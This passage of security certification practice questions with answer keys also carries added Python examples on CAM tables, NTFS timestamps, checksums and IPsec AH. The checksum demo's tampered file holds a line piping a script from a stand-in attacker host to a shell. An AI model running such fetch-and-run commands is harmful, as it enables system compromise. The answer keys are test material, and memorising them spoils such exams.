A It is imperative to identify precisely which risks are transferring to the cloud, which risks the service provider is undertaking, and which risks remain with the organization. A service level agreement (SLA) outlines those risks and responsibilities. A trust relationship simply defines the relationship with a cloud service provider. The more important the service is to a business, the more risk the business invests in that trust relationship. A responsibility matrix is a good way to identify what risks exist, and who is responsible for them. The matrix can be part of an SLA. High availability is an approach to keeping systems functionality at a constant.
Evaluate approaches to applying patch management updates to select the accurate statement. A. Operating System major release updates can cause problems with software application compatibility. B. Applying all patches as released is more time consuming than only applying patches as needed. C. It is more costly to apply all patches, so most companies choose to apply patches on an as-needed basis. D. It is best practice to install patches immediately to provide the highest level of security for workstations.
A It is well recognized that Operating System major release updates can cause problems with software application compatibility. The least time-consuming approach is to apply all of the latest patches. A system administrator who applies patches on a case-by-case basis must stay up to date with security bulletins to see if a patch is necessary. Patches are usually provided at no cost. The cost associated with patches is the time it takes to test, review, and apply them. It is best practice to trial and update on a test system to try to discover whether it will cause any problems. Applying a patch immediately could do more harm than good to the workstations.
Identify the attack that can launch by running software against the CAM table on the same switch as the target. A. MAC flooding B. MAC spoofing C. ARP poisoning attack D. LLMNR
A MAC flooding is a layer 2 attack closely related to ARP poisoning, but while ARP poisoning is directed at hosts, MAC flooding is used to attack a switch. The attacker floods the switch with frames carrying thousands of bogus source MAC addresses until the content addressable memory (CAM) table that maps MAC addresses to ports is exhausted; the switch can then no longer look up legitimate destinations and falls back to flooding those frames out of every port, so the attacker can sniff traffic that would otherwise have been unicast to the target. MAC spoofing changes the MAC address configured on an adapter interface or asserts the use of an arbitrary MAC address. It is simple to override a MAC address in software via OS commands, alterations to the network driver configuration, or packet crafting software. An ARP poisoning attack broadcasts unsolicited ARP reply packets; a sophisticated ARP attack can be launched by running software such as Dsniff or Ettercap. LLMNR is a name resolution service used in a Windows environment to resolve network addresses. Responder is an on-path tool that can be used to exploit name resolution on a Windows network.
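The CAM table behaviour described above, as an added example that is not part of the original page: a toy switch model that learns source MACs into a fixed-size table and floods frames whose destination it can no longer look up. The 8-entry capacity, the oldest-entry eviction policy, the port numbers and the MAC addresses are all assumptions made for the example; real switches hold thousands of entries and vendors differ in how a full table behaves.

```python
"""Toy model of a switch CAM table under MAC flooding (added example)."""
import os
from collections import OrderedDict

BROADCAST = "ff:ff:ff:ff:ff:ff"


class Switch:
    def __init__(self, ports, capacity=8):
        self.ports = set(ports)
        self.capacity = capacity
        self.cam = OrderedDict()  # MAC address -> port, oldest entry first

    def learn(self, src_mac, port):
        # Assumed policy: a full table evicts its oldest entry to learn a new one.
        if src_mac not in self.cam and len(self.cam) >= self.capacity:
            self.cam.popitem(last=False)
        self.cam[src_mac] = port

    def forward(self, src_mac, dst_mac, ingress):
        """Return the set of ports the frame is sent out of."""
        self.learn(src_mac, ingress)
        if dst_mac in self.cam:
            return {self.cam[dst_mac]}
        # Broadcast or unknown unicast: flood everywhere except the ingress port.
        return self.ports - {ingress}


def random_mac():
    return ":".join(f"{b:02x}" for b in os.urandom(6))


def mac_flood(switch, attacker_port, count):
    """Send `count` frames with bogus source MACs from the attacker's port."""
    for _ in range(count):
        switch.forward(random_mac(), BROADCAST, attacker_port)


def demo():
    """Victim on port 1, server on port 2, attacker on port 3 (constructed topology)."""
    sw = Switch(ports=[1, 2, 3], capacity=8)
    victim, server = "aa:aa:aa:aa:aa:01", "aa:aa:aa:aa:aa:02"
    sw.forward(victim, server, 1)             # switch learns victim at port 1
    sw.forward(server, victim, 2)             # switch learns server at port 2
    before = sw.forward(victim, server, 1)    # known destination: unicast to port 2 only
    mac_flood(sw, attacker_port=3, count=1000)
    after = sw.forward(victim, server, 1)     # server entry evicted: frame is flooded
    return before, after


if __name__ == "__main__":
    print(demo())  # the second set now includes the attacker's port 3
```

The defence this illustrates is port security: limiting the number of MAC addresses a switch port may learn (and shutting the port or raising an alert when the limit is exceeded) stops a single port from filling the table.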
A company has an annual contract with an outside firm to perform a security audit on their network. The purpose of the annual audit is to determine if the company is in compliance with their internal directives and policies for security control. Select the broad class of security control that accurately demonstrates the purpose of the audit. A. Managerial B. Technical C. Physical D. Compensating
A A managerial control gives oversight of the information system, including the selection of other security controls; regular scans and audits are examples. A technical control is implemented as a system (hardware, software, or firmware): firewalls, antivirus software, and OS access control models are technical controls, also described as logical controls. Physical controls deter access to premises and hardware; examples include alarms, gateways, and locks. A compensating control serves as a substitute for a principal control recommended by a security standard and affords the same (or better) level of protection, but uses a different methodology or technology.
Analyze the following scenarios and determine which accurately describes the use of an ad hoc Wi-Fi network. A. Two or more wireless devices connect to each other on a temporary basis. B. A smartphone shares its Internet connection with a PC. C. Mobile device connects with a wireless speaker and keyboard. D. A smartphone connects to a PC via Bluetooth.
A Multiple wireless devices can establish peer-to-peer connections with one another rather than using an access point. The devices operate in ad hoc mode rather than infrastructure mode and are meant to form temporary networks. A smartphone sharing its mobile data connection with a PC, for example via USB, is tethering, where the smartphone acts as a hotspot. A mobile device creates a personal area network (PAN) when it connects to peripherals such as a wireless speaker or keyboard, for example via Bluetooth. A smartphone can also tether a single PC over a Bluetooth connection. The term "Wi-Fi tethering" is also widely used to mean a hotspot.
An engineer retrieves data for a legal investigation related to an internal fraud case. The data in question is from an NTFS volume. What will the engineer have to consider with NTFS when documenting a data timeline? A. UTC time B. NTP Server C. Time server D. DHCP server
A NTFS records timestamps in UTC internally; tools such as Explorer display them converted to the machine's local time zone. When collecting evidence, it is vital to document the procedure used to interpret a timestamp and to note the difference between the local system time and UTC. Devices might be pointed towards an NTP server to synchronize time, but the engineer must record the time the device itself was keeping, including any clock drift or misconfigured time zone. Most computers have their clock configured to synchronize to a Network Time Protocol (NTP) server, and closely synchronized time is important for authentication and audit systems to work properly. A Dynamic Host Configuration Protocol (DHCP) server is not associated with time; it distributes IP addresses to clients on the network, although its lease logs could still help attribute an IP address to a host during the investigation.
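The timestamp handling described above, as an added example that is not part of the original page. NTFS stores MFT timestamps as 64-bit little-endian FILETIME values, the number of 100-nanosecond intervals since 1601-01-01 00:00:00 UTC. The code converts raw values to UTC and back and produces the pair of values an examiner should record: the UTC time and what the examined system would have displayed. The sample value and the -5 hour system offset are constructed for the example.

```python
"""Decode NTFS FILETIME values for a forensic timeline (added example)."""
import struct
from datetime import datetime, timedelta, timezone

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)
TICKS_PER_SECOND = 10_000_000  # FILETIME counts 100 ns intervals


def filetime_to_utc(raw):
    """Convert an integer FILETIME to a timezone-aware UTC datetime."""
    return EPOCH_1601 + timedelta(microseconds=raw // 10)


def filetime_from_bytes(data):
    """Parse the 8 little-endian bytes as stored in an MFT attribute."""
    (raw,) = struct.unpack("<Q", data)
    return filetime_to_utc(raw)


def utc_to_filetime(dt):
    """Inverse conversion, useful for searching raw bytes for a known time."""
    delta = dt.astimezone(timezone.utc) - EPOCH_1601
    return (delta.days * 86_400 + delta.seconds) * TICKS_PER_SECOND + delta.microseconds * 10


def timeline_entry(raw, system_offset_hours):
    """What to record: the raw value, the UTC time, and the system's displayed local time.

    system_offset_hours is the UTC offset the examined machine was configured with,
    taken from its registry or clock settings (assumed to be known here).
    """
    utc = filetime_to_utc(raw)
    local = utc.astimezone(timezone(timedelta(hours=system_offset_hours)))
    return {
        "filetime": raw,
        "utc": utc.isoformat(),
        "local": local.isoformat(),
        "offset_hours": system_offset_hours,
    }


if __name__ == "__main__":
    # 116444736000000000 is the FILETIME of the Unix epoch, a convenient check value.
    print(timeline_entry(116444736000000000, -5))
```

Recording both values avoids the classic timeline error of mixing a UTC timestamp from one artefact with a local-time timestamp from another.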
If an administrator on an Exchange server needs to send digitally signed and encrypted messages, what messaging implementation will best suit the administrator's needs? A. Secure/Multipurpose Internet Mail Extensions (S/MIME) B. Secure Post Office Protocol v3 (POP3S) C. Internet Message Access Protocol v4 (IMAP4) D. Simple Mail Transfer Protocol (SMTP)
A One means of applying authentication and confidentiality on a per-message basis is an email encryption standard called Secure/Multipurpose Internet Mail Extensions (S/MIME). S/MIME adds digital signatures and public key cryptography to mail communications. To use S/MIME, a sender and receiver exchange digital certificates signed by a certification authority (CA). POP3 is a mailbox protocol designed to store the messages delivered by SMTP on a server. When the client connects to the mailbox, POP3 downloads the messages to the recipient's email client. IMAP4 is an application protocol that allows a client to access and manage email messages stored in a mailbox on a remote server. SMTP is the basic protocol used to send mail between hosts on the Internet.
A Certificate Revocation List (CRL) has a publish period set to 24 hours. Based on the normal procedures for a CRL, what is the most applicable validity period for this CRL? A. 26 hours B. 1 hour C. 23 hours D. 72 hours
A One or two hours over the publish period is considered normal, thus making 26 hours within the window. The validity period is the period during which the CRL is considered authoritative; in X.509 terms it ends at the CRL's nextUpdate time. This is usually a bit longer than the publish period, giving relying parties a short overlap in which to fetch the new CRL while the old one is still authoritative. The validity period would not be less than the publish period, as it would make the CRL nonauthoritative before the next publication. If the validity period were set to 72 hours, this would be much too long after the publish period: the CRL would be published two additional times before the validity period ended, and a revoked certificate could be accepted for up to two days longer than intended.
Which statement best describes key differences between symmetric and asymmetric cryptographic ciphers? A. Symmetric encryption is used for confidentiality, and uses the same key for encryption and decryption. B. Asymmetric encryption is primarily used for confidentiality, and uses different keys for encryption and decryption. C. Symmetric encryption is used for authentication, and is the most efficient method of encryption for large data transfers. D. Asymmetric encryption is used for non-repudiation and is the most efficient method of encryption for large data transfers.
A Symmetric encryption is used for confidentiality and uses the same key for encryption and decryption. It is very fast and useful for bulk encryption of large amounts of data. Because both parties hold the same key, a symmetric key alone cannot prove to a third party which of them produced a message, so it cannot provide identity proof or non-repudiation (a shared key can still protect integrity between the two parties, as in an HMAC). Asymmetric encryption uses two different but related keys, a public key and a private key, and can be used to prove identity, authenticate, provide non-repudiation, and perform key agreement and exchange. It involves substantial computing overhead compared to symmetric encryption and is inefficient for encrypting or transporting large amounts of data, which is why it is typically used to protect a symmetric session key rather than the data itself.
A security team suspects the unauthorized use of an application programming interface (API) to a private web-based service. Which metrics do the team analyze and compare to a baseline for response times and usage rates, while investigating suspected DDoS attacks? (Select all that apply.) A. Number of requests B. Error rates C. Latency D. Endpoint connections
A and C The number of requests is a basic load metric that counts requests per second or requests per minute. Depending on the service type, an administrator can set a baseline for typical usage. Latency is the time in milliseconds (ms) taken for the service to respond to an API call; it can be measured for specific services or as an aggregate value across all services. Error rates measure the number of errors as a percentage of total calls, usually classifying error types under category headings. Administrators can manage unauthorized and suspicious endpoint connections to the API in the same sort of way as remote access.
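The metrics named above compared against a baseline, as an added example that is not part of the original page. It parses constructed API gateway log lines, computes per-minute request volume, 95th percentile latency and error rate, and flags minutes that exceed an assumed baseline. The log format, the baseline numbers and the log lines themselves are all constructed for the example.

```python
"""Flag API usage that deviates from a baseline (added example, constructed data)."""
import math
import re
from collections import defaultdict

# Assumed log format: "<ISO timestamp>Z <method> <path> <status> <latency>ms"
LOG_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d):\d\dZ (?P<method>[A-Z]+) (?P<path>\S+) "
    r"(?P<status>\d{3}) (?P<latency>\d+)ms$"
)

# Assumed baseline for this service, normally derived from historical data.
BASELINE = {"requests_per_min": 5, "p95_latency_ms": 120, "error_rate": 0.05}

SAMPLE_LOG = [
    "2024-05-01T10:00:03Z GET /api/v1/orders 200 40ms",
    "2024-05-01T10:00:17Z GET /api/v1/orders/42 200 55ms",
    "2024-05-01T10:00:31Z POST /api/v1/orders 201 38ms",
    "2024-05-01T10:00:50Z GET /api/v1/customers/7 200 61ms",
] + [
    # Constructed burst: 12 unauthenticated calls in one minute, all rejected and slow.
    f"2024-05-01T10:01:{sec:02d}Z GET /api/v1/customers/{sec} 401 {280 + sec}ms"
    for sec in range(0, 60, 5)
]


def parse(lines):
    """Group (status, latency) pairs by minute; unparseable lines are skipped."""
    per_minute = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            per_minute[m["ts"]].append((int(m["status"]), int(m["latency"])))
    return per_minute


def p95(values):
    """Nearest-rank 95th percentile."""
    ordered = sorted(values)
    return ordered[max(0, math.ceil(0.95 * len(ordered)) - 1)]


def minute_metrics(entries):
    count = len(entries)
    errors = sum(1 for status, _ in entries if status >= 400)
    return {
        "requests": count,
        "p95_latency_ms": p95([latency for _, latency in entries]),
        "error_rate": errors / count,
    }


def anomalies(lines, baseline=BASELINE, factor=2.0):
    """Return {minute: [reasons]} for minutes exceeding the baseline by `factor`."""
    flagged = {}
    for minute, entries in sorted(parse(lines).items()):
        m = minute_metrics(entries)
        reasons = []
        if m["requests"] > factor * baseline["requests_per_min"]:
            reasons.append("request volume")
        if m["p95_latency_ms"] > factor * baseline["p95_latency_ms"]:
            reasons.append("latency")
        if m["error_rate"] > baseline["error_rate"]:
            reasons.append("error rate")
        if reasons:
            flagged[minute] = reasons
    return flagged


if __name__ == "__main__":
    print(anomalies(SAMPLE_LOG))
```

The error rate is counted here from any 4xx or 5xx status, because a rising share of 401 and 403 responses is exactly the signature of someone probing the API with bad or stolen credentials; a DDoS shows up first in the request count and latency.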
A system administrator downloads and installs software from a vendor website. Soon after installing the software, the administrator's computer is taken over remotely. After closer investigation, the software package was modified, probably while it was downloading. What action could have prevented this incident from occurring? A. Validate the software using a checksum B. Validate the software using a private certificate C. Validate the software using a key signing key D. Validate the software using Kerberos
A The administrator should have validated the software with a checksum: a cryptographic hash algorithm generates a fixed-length digest from the file contents, and if the file is changed, the digest of the modified file will not match the published one. This only works if the reference digest is obtained from a source the attacker cannot also tamper with, such as a signed release manifest or a page fetched over TLS from a host other than the download mirror. A private certificate does not validate software. A key signing key is associated with Domain Name System Security Extensions (DNSSEC), which validates DNS responses to help mitigate spoofing and poisoning attacks; it does not apply to software. Kerberos is an authentication service based on a time-sensitive ticket-granting system; it validates users, not software.
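The checksum validation described above, as an added example that is not part of the original page. It verifies downloaded files against a manifest in the format `sha256sum` emits (`<hex digest>  <filename>`) and shows the check failing for a file that was modified after the manifest was produced. The file contents, the tampered payload line and the temporary directory are constructed for the example.

```python
"""Verify downloads against a SHA-256 manifest (added example, constructed files)."""
import hashlib
import hmac
import os
import tempfile


def sha256_file(path, chunk_size=1 << 16):
    """Stream the file through SHA-256 so large installers do not need to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def parse_manifest(text):
    """Return {filename: digest} from sha256sum-style lines ('*' marks binary mode)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, rest = line.partition(" ")
        entries[rest.lstrip(" *")] = digest.lower()
    return entries


def verify(directory, manifest_text):
    """Return {filename: bool} for every file listed in the manifest."""
    results = {}
    for name, expected in parse_manifest(manifest_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = False
            continue
        # compare_digest is constant-time; cheap hygiene when either side may be attacker-influenced.
        results[name] = hmac.compare_digest(sha256_file(path), expected)
    return results


def demo():
    """Write a clean installer and a tampered copy, then verify both against one manifest."""
    with tempfile.TemporaryDirectory() as d:
        good = b"#!/bin/sh\necho installing vendor tool\n"
        # Constructed tampering: an extra line appended during download.
        tampered = good + b"curl -s http://attacker.example/x | sh\n"
        with open(os.path.join(d, "installer.sh"), "wb") as f:
            f.write(good)
        with open(os.path.join(d, "installer-mirror.sh"), "wb") as f:
            f.write(tampered)
        # The manifest lists the vendor's digest for both copies; only the clean one matches.
        digest = hashlib.sha256(good).hexdigest()
        manifest = f"{digest}  installer.sh\n{digest}  installer-mirror.sh\n"
        return verify(d, manifest)


if __name__ == "__main__":
    print(demo())
```

The manifest in the demo is generated locally only so the example runs offline; in practice it has to arrive through a channel independent of the download, or be signed, or an attacker who swaps the file simply swaps the digest too.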
A security team has just added iris scanners to two access control points in a secure facility. They are in the process of making adjustments to ensure authorized users have access, while unauthorized users cannot get through. Analyze the scenario and determine what metric the team is in the process of fine-tuning. A. Crossover error rate (CER) B. False rejection rate (FRR) C. False acceptance rate (FAR) D. Type II error
A Fine-tuning a biometric system means adjusting its match threshold, and the crossover error rate (CER) is the point at which the false rejection rate and false acceptance rate meet; a lower CER indicates a more accurate system. The false rejection rate (FRR) is also known as a type I error, which rejects authorized templates. The false acceptance rate (FAR) is the rate at which the system lets in unauthorized users, which constitutes a security breach. A type II error is a false positive, measured by the FAR; this is the rate at which unauthorized personnel gain access to the secure facility.
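The FAR, FRR and crossover error rate defined above computed from match scores, as an added example that is not part of the original page. A matcher emits a similarity score for each comparison and the administrator picks a threshold; genuine scores (a user against their own template) and impostor scores (anyone else against that template) overlap, so moving the threshold trades one error for the other. The two score lists are constructed, not measured.

```python
"""FAR, FRR and crossover error rate from match scores (added example, constructed data)."""

GENUINE = [0.92, 0.88, 0.95, 0.81, 0.77, 0.90, 0.85, 0.69, 0.93, 0.87]   # constructed
IMPOSTOR = [0.31, 0.45, 0.52, 0.60, 0.72, 0.38, 0.49, 0.66, 0.55, 0.41]  # constructed


def far(impostor, threshold):
    """False acceptance rate (type II): fraction of impostor attempts that pass."""
    return sum(s >= threshold for s in impostor) / len(impostor)


def frr(genuine, threshold):
    """False rejection rate (type I): fraction of genuine attempts that fail."""
    return sum(s < threshold for s in genuine) / len(genuine)


def crossover(genuine, impostor, steps=100):
    """Sweep thresholds; return (threshold, error_rate) where FAR and FRR are closest."""
    best = None
    for i in range(steps + 1):
        t = i / steps
        a, r = far(impostor, t), frr(genuine, t)
        gap = abs(a - r)
        if best is None or gap < best[0]:
            best = (gap, t, (a + r) / 2)
    _, threshold, cer = best
    return threshold, cer


def tune(genuine, impostor, max_far, steps=100):
    """Lowest threshold whose FAR does not exceed max_far, with the FRR that costs.

    This is how a secure facility tunes: cap false acceptances first, then
    accept whatever false rejection rate results.
    """
    for i in range(steps + 1):
        t = i / steps
        if far(impostor, t) <= max_far:
            return t, frr(genuine, t)
    return 1.0, 1.0


if __name__ == "__main__":
    print("CER at threshold %.2f: %.2f" % crossover(GENUINE, IMPOSTOR))
    print("Zero FAR needs threshold %.2f, FRR %.2f" % tune(GENUINE, IMPOSTOR, 0.0))
```

Lowering the threshold lets more authorized staff through on the first try but raises FAR; the scanners in the scenario are being adjusted along exactly this curve.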
Compare physical access controls with network security to identify the statements that accurately connect the similarities between them. (Select all that apply.) A. Authentication provides users access through the barriers, while authorization determines the barriers around a resource. B. An example of authentication in networking is a user logging into the network with a smart card. Similarly, authentication in physical security is demonstrated by an employee using a badge to enter a building. C. Authorization provides users access through barriers, while authentication creates barriers around a resource. D. An example of authorization in networking is a user logging into the network with a smart card. Similarly, authorization in physical security is demonstrated by an employee using a badge to enter a building.
A and B Authentication creates access lists and identification mechanisms to allow approved persons through the barriers. Authorization determines the barriers around a resource so that access can be controlled through defined entry and exit points. An example of authentication is a user who logs into a network with a smart card. In terms of physical security, authentication is represented by an employee using a badge to enter a building. An example of authorization is used to determine which files a user has on the network after authenticating. In physical security, the same can be said of the barriers in place to determine which employees can access a controlled room.
Which type of employee training utilizes gaming and/or scenario-based techniques to emphasize training objectives? (Select all that apply.) A. Capture the flag (CTF) B. Computer-based training (CBT) C. Penetration Testing audit D. Role-based training
A and B Capture the Flag (CTF) is usually used in ethical hacker training programs and gamified competitions. Participants complete a series of challenges within a virtualized computing environment to discover a flag that represents a vulnerability or attack to overcome. Computer-based training (CBT) allows a student to acquire skills and experience by completing practical simulations or branching choice scenarios, and might use video game elements to improve engagement. A penetration testing audit is an assessment of the organization's security posture, not an employee training technique; only if it were run as a purple team exercise, with defenders learning alongside the attackers, would it count as scenario-based learning. Role-based training focuses on the different levels of security training, education, or awareness that different user roles require; it describes who is trained rather than a gaming or scenario technique.
A security administrator employs a security method that can operate at layer 3 of the OSI model. Which of the following secure communication methods could the security administrator be using? (Select all that apply.) A. ESP B. AH C. TLS D. IKE
A and B Encapsulating Security Payload (ESP) provides confidentiality and/or authentication and integrity and is one of the two core protocols of IPsec, carried directly over IP (protocol number 50). Authentication Header (AH) is the other core protocol (protocol number 51). AH computes an HMAC over the whole packet, including the immutable fields of the IP header, using a shared secret key known only to the communicating hosts, and carries this HMAC in its header as an Integrity Check Value (ICV); fields that routers change in transit, such as TTL and the header checksum, are zeroed before hashing. Transport Layer Security is applied at the application level, either by using a separate secure port or by using commands in the application protocol to negotiate a secure connection. The Internet Key Exchange (IKE) protocol handles authentication and key exchange for IPsec, negotiating the Security Associations (SAs) that ESP and AH then use; it runs over UDP rather than directly at layer 3.
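The AH Integrity Check Value described above, as an added example that is not part of the original page. It builds a minimal IPv4 packet with an AH header, computes the ICV as HMAC-SHA-256 truncated to 128 bits (the HMAC-SHA-256-128 transform of RFC 4868) with the mutable IPv4 fields zeroed, and shows that a router decrementing the TTL does not break verification while a one-bit payload change does. The key, addresses, SPI and payload are constructed; IPv4 options are not handled.

```python
"""IPsec AH ICV over an IPv4 packet with HMAC-SHA-256-128 (added example)."""
import hashlib
import hmac
import struct

AH_PROTOCOL = 51
ICV_LEN = 16  # HMAC-SHA-256-128 keeps the first 128 bits of the 256-bit HMAC
KEY = b"constructed-demo-key-32-bytes!!!"  # constructed; a real SA key comes from IKE


def ipv4_header(src, dst, total_len, ttl=64, tos=0, flags_frag=0x4000, proto=AH_PROTOCOL):
    """Minimal 20-byte IPv4 header (no options); checksum left zero as it is mutable anyway."""
    return struct.pack("!BBHHHBBH4s4s", 0x45, tos, total_len, 0x1234, flags_frag, ttl,
                       proto, 0, bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))


def ah_header(next_header, spi, seq):
    """12 fixed AH bytes: next header, payload len (32-bit words minus 2), reserved, SPI, seq."""
    payload_len = (12 + ICV_LEN) // 4 - 2
    return struct.pack("!BBHII", next_header, payload_len, 0, spi, seq)


def zero_mutable(ip_hdr):
    """Copy of the header with TOS, flags/fragment offset, TTL and checksum zeroed (RFC 4302)."""
    b = bytearray(ip_hdr)
    b[1] = 0                 # TOS / DSCP + ECN
    b[6:8] = b"\x00\x00"     # flags + fragment offset
    b[8] = 0                 # TTL
    b[10:12] = b"\x00\x00"   # header checksum
    return bytes(b)


def compute_icv(key, ip_hdr, ah_fixed, payload):
    """HMAC over immutable IP fields, AH header with the ICV field zeroed, and the payload."""
    data = zero_mutable(ip_hdr) + ah_fixed + bytes(ICV_LEN) + payload
    return hmac.new(key, data, hashlib.sha256).digest()[:ICV_LEN]


def build_packet(key, src, dst, payload, spi=0x100, seq=1, next_header=17):
    total_len = 20 + 12 + ICV_LEN + len(payload)
    ip_hdr = ipv4_header(src, dst, total_len)
    ah_fixed = ah_header(next_header, spi, seq)
    return ip_hdr + ah_fixed + compute_icv(key, ip_hdr, ah_fixed, payload) + payload


def verify_packet(key, packet):
    """Receiver side: recompute the ICV and compare in constant time."""
    ip_hdr, ah_fixed = packet[:20], packet[20:32]
    icv, payload = packet[32:32 + ICV_LEN], packet[32 + ICV_LEN:]
    return hmac.compare_digest(compute_icv(key, ip_hdr, ah_fixed, payload), icv)


def forward_through_router(packet):
    """A hop decrements TTL (and would fix the checksum); the ICV must still verify."""
    b = bytearray(packet)
    b[8] -= 1
    return bytes(b)


def tamper_payload(packet):
    b = bytearray(packet)
    b[-1] ^= 0x01
    return bytes(b)


if __name__ == "__main__":
    pkt = build_packet(KEY, "10.0.0.1", "10.0.0.2", b"hello ipsec")
    print(verify_packet(KEY, pkt), verify_packet(KEY, forward_through_router(pkt)),
          verify_packet(KEY, tamper_payload(pkt)))
```

The zeroing step is why AH survives routing but not NAT: a translator rewrites the source address, which is an immutable field under the HMAC, so the ICV fails at the receiver. That is the practical reason ESP is deployed far more often than AH.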
Analyze the following scenarios and determine which cases call for account disablement over account lockout. (Select all that apply.) A. Audit logs reveal suspicious activity on a privileged user's account. B. A user's company laptop and key fob are stolen at an airport. C. A user enters an incorrect password multiple times. D. A privileged user attempts to log onto a company server outside of authorized hours.
A and B If administrators detect or suspect account misuse, they can manually disable the account, preventing it from being used for login; a remote logoff command can end a session in progress. Smart cards or USB key fobs can store a user's certificate and private key, which can authenticate to different PCs and mobile devices. A stolen laptop and key fob mean those credentials must be treated as compromised, so the account should be disabled (and the certificate revoked) rather than merely locked. An account enters a locked state because of a policy violation, such as entering an incorrect password too many times; lockouts usually last for a limited duration. A time-of-day policy establishes authorized logon hours for an account, and time- and location-based policies prevent users from logging in outside authorized hours and locales without requiring the account to be disabled.
A developer considers using an API for service integration and automation. If choosing Representational State Transfer (REST) as the API, which features can the developer expect? (Select all that apply.) A. The ability to submit a request as an HTTP operation/verb B. It is a looser architectural framework C. It uses XML format messaging D. It has built-in error handling
A and B Requests sent using the Simple Object Access Protocol (SOAP) must be correctly formatted XML documents, whereas Representational State Transfer (REST) requests are submitted as HTTP operations/verbs (GET or POST, for example) against a resource URL. REST is a looser architectural style rather than a protocol, and APIs that follow it are referred to as RESTful APIs. SOAP is a tightly specified protocol: it uses XML format messaging, has a number of extensions in the form of Web Services (WS) standards, and has built-in error handling and support for common features such as authentication, transport security, and asynchronous messaging.
A company security manager takes steps to increase security on Internet of Things (IoT) devices and embedded systems throughout a company's network and office spaces. What measures can the security manager use to implement secure configurations for these systems? (Select all that apply.) A. Isolate hosts that are using legacy versions of operating systems (OSes) from other network devices through network segmentation. B. Use wrappers, such as Internet Protocol Security (IPSec) for embedded systems' data in transit. C. Increase network connectivity for embedded systems so they receive regular updates. D. Maintain vendor-specific software configuration on Internet of Things (IoT) devices that users operate at home and in the office.
A and B Some embedded systems use legacy OSes, making them difficult to secure; isolating these hosts from others through network segmentation and using endpoint security can help protect them against exploitation. One way of increasing the security of data in transit for embedded systems is through the use of wrappers such as IPSec, which secures data through authentication and encryption. Static environments should have network access only for the specific security control functions that need it and should be kept separate from the corporate network with perimeter security, so increasing connectivity is the wrong approach. IoT devices designed for residential use are shipped to "work" with a minimum of configuration effort and often have weak defaults that customers never change; the vendor's default configuration should be hardened, not maintained.
An engineer utilizes digital forensics for information gathering. While doing so, the first focus is counterintelligence. Which concepts does the engineer pursue? (Select all that apply.) A. Identification and analysis of specific adversary tactics B. Retrospective network analysis C. Configure and audit active logging systems D. Inform risk management provisioning
A and C Counterintelligence includes the identification and analysis of specific adversary tactics, techniques, and procedures (TTPs), which improves understanding of adversary approaches and tells defenders what to monitor for. Counterintelligence also informs how to configure and audit active logging systems so that they are most likely to capture evidence of attempted and successful intrusions. A Retrospective Network Analysis (RNA) solution provides the means to record network events at either a packet header or payload level; it is a data source rather than a counterintelligence concept. Strategic intelligence is information gathered through research that provides insights used to inform risk management and security control provisioning.
A user presents a smart card to gain access to a building. Authentication is handled through integration to a Windows server that's acting as a certificate authority on the network. Review the security processes and conclude which are valid when using Kerberos authentication. (Select all that apply.) A. Inputting a correct PIN authorizes the smart card's cryptoprocessor to use its private key to create a Ticket Granting Ticket (TGT) request. B. The smart card generates a one-time use Ticket Granting Service (TGS) session key and certificate. C. The Authentication Server (AS) trusts the user's certificate as it was issued by a local certification authority. D. The Authentication Server (AS) is able to decrypt the request because it has a matching certificate.
A and C Inputting a correct PIN authorizes the smart card's cryptoprocessor to use its private key to sign a Ticket Granting Ticket (TGT) request to an Authentication Server (AS). The AS can trust the request when the user's certificate was issued by a local or third-party root certification authority that the AS trusts. The AS, not the smart card, responds with a TGT and a Ticket Granting Service (TGS) session key. The AS does not need a "matching certificate" to process the request; it verifies the request's signature using the public key in the user's certificate and protects its reply so that only the holder of the card's private key can recover the session key.
Select the options that can be configured by Group Policy Objects (GPOs). (Select all that apply.) A. Registry settings B. Code signing C. Access policies D. Baseline deviation
A and C On a Windows Active Directory network, access policies can be configured via group policy objects (GPOs). GPOs can be used to configure access rights for user/group/role accounts. GPOs can configure registry settings across a range of computers. Code signing is the principal means of proving the authenticity and integrity of code (an executable or a script). A GPO can deploy Code Integrity (CI) policies to check for application publisher digital signatures, but not for signing or creating new digital signatures. Baseline deviation reporting tests the configuration of clients and servers to ensure they are patched, and their configuration settings match the baseline template.
Analyze automation strategies to differentiate between elasticity and scalability. Which scenarios demonstrate scalability? (Select all that apply.) A. A company is hired to provide data processing for 10 additional clients and has a linear increase in costs for the support. B. A company is hired to provide data processing for 10 additional clients and is able to utilize the same servers to complete the tasks without performance reduction. C. A company has a 10% increase in clients and a 5% increase in costs. D. A company has a 10% increase in clients and a 10% decrease in server performance.
A and C Scalability means that the cost of supplying the service to more users grows linearly (or better). For example, if the number of users doubles in a scalable system, the cost of maintaining the same level of service also doubles or less than doubles; if costs more than double, the system is less scalable. A company that is hired to provide data processing for ten additional clients and sees a linear increase in support costs is running a scalable system, and a company with a 10% increase in clients and only a 5% increase in costs is highly scalable, because costs grew less than the client base. Elasticity refers to a system's ability to handle changes in demand in real time: a company that takes on ten additional clients and uses the same servers to complete the task without performance reduction is displaying elasticity. A company with a 10% increase in clients and a 10% decrease in server performance is demonstrating neither; performance degrading in step with load shows the system is not scaling to meet demand.
Analyze the features of behavioral technologies for authentication, and choose the statements that accurately depict this type of biometric authentication. (Select all that apply.) A. Behavioral technologies are cheap to implement, but have a higher error rate than other technologies. B. Signature recognition is popular within this technology because everyone has a unique signature that is difficult to replicate. C. Obtaining a voice recognition template for behavioral technologies is rather easy and can be obtained quickly. D. Behavior technologies may use typing as a template, which matches the speed and pattern of a user's input of a passphrase.
A and D Behavioral technologies are sometimes classified as "something you do." These technologies often have a lower cost to implement than other types of biometric cryptosystems, but they have a higher error rate. Typing is used as a behavioral technology, and the template is based on the speed and pattern of a user's input of a passphrase. Signature recognition is not based on the actual signature due to it being easy to replicate. Instead, it is based on the process of applying a signature such as stroke, speed, and pressure of the stylus. Obtaining a voice recognition template is not a fast process, and can be difficult. Background noise and other environmental factors can also interfere with authentication.
